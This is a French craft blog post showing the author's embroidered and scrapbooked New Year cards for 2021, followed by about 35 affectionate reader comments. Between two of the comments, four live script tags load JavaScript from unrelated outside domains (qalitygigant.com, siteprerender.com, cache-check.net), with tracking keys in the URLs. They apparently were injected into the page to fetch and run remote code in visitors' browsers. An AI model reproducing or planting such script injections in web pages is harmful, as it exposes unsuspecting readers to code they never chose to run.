• Cartes de Voeux

     

     

    Cartes de Voeux

     

    { A Retrouver dans la Rubrique "Bonjour"-"Divers" ICI }

     

     

    Aujourd'hui, je viens publier ce qu'il me restait à vous montrer de mes créations de Cartes de Vœux pour 2021

     

     

    Cartes de Voeux

     

     

     

     

     

    Cartes de Voeux

     

     

     

     

     

    Cartes de Voeux

     

     

     

     

     

    Cartes de Voeux

     

     

     

     

     

    Cartes de Voeux

     

    Cartes de Voeux

     

     

     

     

     

    Cartes de Voeux

     

     

     

     

     

    Cartes de Voeux

     

    { A Retrouver dans la Rubrique "Séparations"-"Hiver,Noël" ICI }

     

     

     

     

     

    Cartes de Voeux

     

    { A Retrouver dans la Rubrique "Merci Visites"-"Divers" ICI }

    { Le Fauteuil est à Retrouver dans la Rubrique "Mes Tubes"-"Meubles,Objets" ICI }

     

     

     

     

     

    Cartes de Voeux

     

    { A Retrouver dans la Rubrique "Jours"-"Hiver" ICI }

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    35
    JO
    Vendredi 22 Janvier 2021 à 19:55

    Bonsoir ma Valie

    Purée!!! quelle belle série, de différent style, vraiment magnifiques (qui me donne des petites idées(mdr). Tes broderies sont de toute beauté!!! Là!!! par contre je ne brode pas(lol)

    BRAVO ma douce

    Bonne soirée et bon week-end, prends bien soin de toi, prudence

    BISOUS DOUX

    JO

     

    34
    Jacline-H-49
    Vendredi 22 Janvier 2021 à 16:55

    Toutes bien jolies, mais celle que je préfère, est celle que j'ai reçue !!! Merci ma douce amie.

    Quel travail minutieux !! Bravo !

    Gros bisous tendresse de 

    Jacline 

     

    33
    Gaelle
    Vendredi 22 Janvier 2021 à 13:28
    Rooooooo, je suis toujours en admiration devant tes broderies, mais ainsi assiciees au Scrap et mises en valeur dans ces cadres, c'est encore plus beau.
    Biz
    Gaelle
    32
    Jeudi 21 Janvier 2021 à 20:17

    Bonsoir ma douce Valie

    J'espère que tu vas bien ainsi que ta fille ? toujours des soucis avec ta connection ? as tu toujours du mauvais temps dans ta région ici un temps moyen mais la pluie et de retour 

    Bonne soirée et gros bisous pour vous deux

    ton amie Janine

     

    31
    Jeudi 21 Janvier 2021 à 16:59

    Tu as parfaitement mis en valeur tes jolies broderies ;

    bisous / Nicole

    30
    Jeudi 21 Janvier 2021 à 13:42
    Très jolie série. J'aime beaucoup ton papier avec l'embossage mannele ! C'est trop mignon.
    Tu as fait une sacrée production. Bisous Bisous (PS je rattrape doucement, je répondrai aux comms et aux mp ensuite)
    29
    Mercredi 20 Janvier 2021 à 22:49

    Très beau florilège de création qui a fait des heureuses je n'en doute pas !

    Bisous

    28
    Mercredi 20 Janvier 2021 à 21:24

    Bonsoir ma douce amie

    Je suis toujours émerveillée pas ce beau travail de broderie

    J'espère que tes ennuis seront passager cela vient peut-être du temps ?

    Bonne et douce nuit pour toi et ta fille

    gros bisous d'amitié

    Janine

    27
    Mercredi 20 Janvier 2021 à 20:54

    Elles sont toutes magnifiques bravo pour ces belles broderies

    Bisous Pierrette67

    26
    Mercredi 20 Janvier 2021 à 18:38

    Travail minutieux que tu réalises à la perfection et que tu nous fait partager 

    Bravo à toi

    Bonne soirée les filles

    Bisous

    25
    Mercredi 20 Janvier 2021 à 18:24

    tu as bien oeuvré en plus de tes broderies 

    bisous bonne soirée

    24
    Mercredi 20 Janvier 2021 à 17:46

    Coucou ma belle Valie, elles sont ravissantes tes cartes, du très beau travail. Merci pour les gifs, passe une douce soirée, bisou rose tendresse !

    23
    mamijojo77100
    Mercredi 20 Janvier 2021 à 17:36

    a fond les ballons!!  non a fond les broderies que tu maitrises superbement bien.. belle serie encore a ton actif. gros bisous et bonne semaine. JOELLE

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1611160511101" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    22
    Mercredi 20 Janvier 2021 à 17:31

    Chapeau l'artiste! Super travail!

    Toutes tes cartes sont très belles!

    J'espère que ta journée de mercredi a été bonne!

    Belle soirée à toi et gros bisous

    21
    Mercredi 20 Janvier 2021 à 16:38

    Très belles créations chère Valie.  Merci pour ce joli partage.

    https://i.postimg.cc/VsWThhMC/chat-marjo.gif

    20
    Mercredi 20 Janvier 2021 à 15:44

    magnifiques tes créas ! bravo

    bisous

    19
    Jeannine (cristal24)
    Mercredi 20 Janvier 2021 à 13:52

    Coucou Valie,

    Tu as fait une très belle série de cartes avec de mignonnes broderies. J'ai beaucoup aimé la mienne, et ça change des cartes habituelles qu'on reçoit pour les voeux.

    Bonne journée dans le mobil home.

    Bises.

    Jeannine

    18
    Mercredi 20 Janvier 2021 à 12:05

    Magnifiques cartes brodées et scrappées comme je les aime ! un grand bravo ! Bonne journée. Gros bisous et à bientôt !

    17
    Mercredi 20 Janvier 2021 à 11:59

    très belle série de cartes de voeux qui ont du ravir leurs destinataires bisous liliane

    16
    Mercredi 20 Janvier 2021 à 11:47

    Très belle ta série de cartes!! Bravo à toi.....

    Bisous et douce journée

    15
    Mercredi 20 Janvier 2021 à 11:44

    Tu as bien bosser, elles sont magnifiques tes cartes ma Valie!

    Bisous et belle journée

    14
    Mercredi 20 Janvier 2021 à 10:55
    Que de jolie cartes tu est très douée et toujours bée bonnes idées bonne journée gros bisous
    13
    Mercredi 20 Janvier 2021 à 10:31
    lamanuelle25

    Toutes jolies mais c'est la mienne la plus belle!! Bises Nadine

    12
    Mercredi 20 Janvier 2021 à 10:10

    Qu'il est beau ton blog, quelle belle présentation !J'aimerai savoir en faire autant . . .

    Une belle série de cartes bien originales.
    Bonne journée.
    Bisous. 

    11
    Mercredi 20 Janvier 2021 à 10:09
    dane

    coucou vraiment très très jolies, pleins de délicatesse, de finesse félicitations c' est vraiment très beaux bisous a bientôt ma belle 

    10
    marianne pirotte
    Mercredi 20 Janvier 2021 à 09:29

    Tes cartes sont adorables, j'adore tes cartes avec les anges brodés, bravo ma belle !!

    Gros bisous

    Mmarianne

    9
    Mercredi 20 Janvier 2021 à 09:10

    C est de toute beauté ma Valie, le poin t compté est un art car il ne faut pas manqué un point, et toi tu as du gout pour ça car on sent que tu aimes, tu as encore de bons yeux, j adorais faire ça avant je travaillais meme avec des perles en meme temps dans mes points, tes cartes sont une splendeur et il faut dire que ça prend du temps, j ai vu la carte que tu m avait faite et le marque page c est édifiant ton travail, passe une bonne journée moi je ne vais pas très bien je na vance plus et demain rayon en plus mais j ai le courage d avancer

    Bisous d affection

    8
    Mercredi 20 Janvier 2021 à 08:55

    hello Valie 

    les cartes sont de toute beauté , c'est superbe 

    quel courage!!

    Je suis occupée de me tricoter un pull et ça me suffit lol

    passe une bonne journée , prends soin de toi 

     gros bisous

    7
    Jour de mai
    Mercredi 20 Janvier 2021 à 08:49

    Coucou Valie, 

    Magnifique travail, elles sont toutes aussi belles les unes que les autres. Mais tu as vraiment des yeux de chats car tes broderies ne sont pas très grandes et malgré cela ressortent très bien. 

    Bravo et merci pour le partage.

    J'aime aussi beaucoup le tampon que tu y apposes pour confirmer le fait main. 

    Bon Mercredi qui est déjà bien venteux et hélas le ciel menaçant de pluie. 

    De très gros bisous ♥♥♥

    6
    Mercredi 20 Janvier 2021 à 08:37

      une  bien  belle  série  de  beau  travail   bravo  !!!!

       gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    5
    Mercredi 20 Janvier 2021 à 08:36

    Bravo elles sont toutes superbes. Un très joli travail et de belles preuves d'amitié

    Bonne journée. Gros bisous

    4
    Mercredi 20 Janvier 2021 à 08:31

    Très jolies ! J'aime beaucoup la seconde avec les épis de blés, mais elles sont très belles et certaines ont vraiment des découpes originales ! 

    Bises

    thaly

    3
    Mercredi 20 Janvier 2021 à 08:26

    Bonjour ma Valie

     tu as réalisé de merveilleuses cartes, elles me font toutes craquer.. bravo à toi

    Passe un bon mercredi

    Gros bisous de Pat

    2
    Mercredi 20 Janvier 2021 à 08:15

    toutes jolies bravo!! bon mercredi à toi plein de bisous

    1
    Mercredi 20 Janvier 2021 à 07:51

    Très belle série de cartounettes ma tite Valie, je craque pour ton Ange brodé, tu es très douée !!

    Prends bien soin de toi, Doux Bisous.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :